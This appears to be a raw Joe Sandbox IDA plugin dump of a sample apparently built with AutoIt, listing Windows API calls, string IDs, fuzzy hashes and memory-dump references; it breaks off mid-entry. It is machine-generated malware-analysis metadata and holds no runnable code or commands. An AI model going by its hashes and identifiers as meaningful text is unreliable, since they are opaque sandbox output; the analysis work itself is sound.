                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                            • String ID: $8'I
                                                                                                                                                                            • API String ID: 2358735015-3608026889
                                                                                                                                                                            • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                                                                            • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                                                                            • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                              • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                                                                                                            • String ID: AutoIt3GUI$Container
                                                                                                                                                                            • API String ID: 3380330463-3941886329
                                                                                                                                                                            • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                                                                            • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                                                                            • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                                                                            • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID: 0vH
                                                                                                                                                                            • API String ID: 1143807570-3662162768
                                                                                                                                                                            • Opcode ID: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                                                                                                                                                            • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                                                                                                            • Opcode Fuzzy Hash: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                                                                                                                                                            • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: HH$HH
                                                                                                                                                                            • API String ID: 0-1787419579
                                                                                                                                                                            • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                                                                            • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                                                                            • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                                                                                                            • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoItemMenu_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 2223754486-4108050209
                                                                                                                                                                            • Opcode ID: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                                                                                                                                                            • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                                                            • Opcode Fuzzy Hash: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                                                                                                                                                            • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: '
                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                            • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                            • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                                                                            • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                                                            • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                            • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                            • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                                                                            • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                                                            • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: Combobox
                                                                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                                                                            • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                            • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                                                            • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                                                                            • String ID: edit
                                                                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                                                                            • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                            • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                                                                            • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                                                            • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                            • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                                                            • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: htonsinet_addr
                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                            • API String ID: 3832099526-2422070025
                                                                                                                                                                            • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                                                            • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                                                                            • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                            • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                                                                            • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                            • API String ID: 2038078732-4266983199
                                                                                                                                                                            • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                                                            • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                                                            • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                                                                            • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                            • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                            • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                                                                            • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                            • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                                                                            • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                            • String ID: ,$UTF8)
                                                                                                                                                                            • API String ID: 909875538-2632631837
                                                                                                                                                                            • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                                                            • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                                                                                                            • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                                                            • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
